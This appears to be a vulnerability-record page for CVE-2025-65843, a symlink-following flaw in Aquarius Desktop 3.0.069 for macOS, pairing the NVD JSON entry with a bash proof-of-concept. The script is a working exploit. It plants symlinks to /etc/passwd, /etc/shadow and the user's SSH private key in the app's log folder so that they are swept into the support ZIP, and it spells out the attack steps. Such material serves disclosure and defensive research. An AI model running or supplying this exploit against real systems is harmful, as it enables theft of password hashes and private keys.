CVE-2025-65843

#!/bin/bash # CVE-2025-65843 PoC - Symlink Following in Aquarius Desktop # This PoC demonstrates how to exfiltrate arbitrary files via symlink manipulation TARGET_DIR="$HOME/Library/Logs/Aquarius" PAYLOAD_DIR="/tmp/cve65843_exploit" mkdir -p "$PAYLOAD_DIR" mkdir -p "$TARGET_DIR" # Create symlinks to sensitive files echo "Creating symlinks to target files..." ln -sf /etc/passwd "$TARGET_DIR/passwd_symlink" ln -sf "$HOME/.ssh/id_rsa" "$TARGET_DIR/ssh_key_symlink" ln -sf /etc/shadow "$TARGET_DIR/shadow_symlink" # Alternative: Create symlink to a writable directory to demonstrate file creation mkdir -p "$PAYLOAD_DIR/target_directory" ln -sf "$PAYLOAD_DIR/target_directory" "$TARGET_DIR/dir_symlink" # Trigger support archive generation echo "Symlinks created in $TARGET_DIR" echo "When user generates support archive, these symlinks will be followed" echo "Files will be included in the generated support ZIP package" echo "" echo "Attack scenario:" echo "1. Attacker gains local access to target machine" echo "2. Creates symlinks in ~/Library/Logs/Aquarius/" echo "3. Waits for user/trigger to generate support archive" echo "4. Attacker obtains the ZIP containing sensitive file contents"

{"cve": {"id": "CVE-2025-65843", "sourceIdentifier": "[email protected]", "published": "2025-12-03T17:15:54.457", "lastModified": "2025-12-18T20:34:55.973", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Aquarius Desktop 3.0.069 for macOS contains an insecure file handling vulnerability in its support data archive generation feature. The application follows symbolic links placed inside the ~/Library/Logs/Aquarius directory and treats them as regular files. When building the support ZIP, Aquarius recursively enumerates logs using a JUCE directory iterator configured to follow symlinks, and later writes file data without validating whether the target is a symbolic link. A local attacker can exploit this behavior by planting symlinks to arbitrary filesystem locations, resulting in unauthorized disclosure or modification of arbitrary files. When chained with the associated HelperTool privilege escalation issue, root-owned files may also be exposed."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-59"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:acustica-audio:aquarius:3.0.069:*:*:*:*:macos:*:*", "matchCriteriaId": "84EDA348-8E6E-4E48-80EE-8A0E58105B4D"}]}]}], "references": [{"url": "https://almightysec.com/insecure-file-handling-via-symlink/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}